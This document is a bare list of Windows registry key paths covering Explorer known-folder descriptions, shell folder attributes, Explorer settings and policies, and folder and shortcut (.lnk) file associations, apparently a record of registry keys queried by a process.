HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Start Menu
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CLASSES_ROOT\.lnk
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\(Default)
HKEY_CLASSES_ROOT\.lnk\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\UserChoice
HKEY_CLASSES_ROOT\lnkfile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\DocObject
HKEY_CLASSES_ROOT\SystemFileAssociations\.lnk
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\CLSID\(Default)
HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046}\Implemented Categories\{00021490-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NeverShowExt
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-735
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-734
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\AccessibilityCpl.dll,-10
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-737
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Roamable
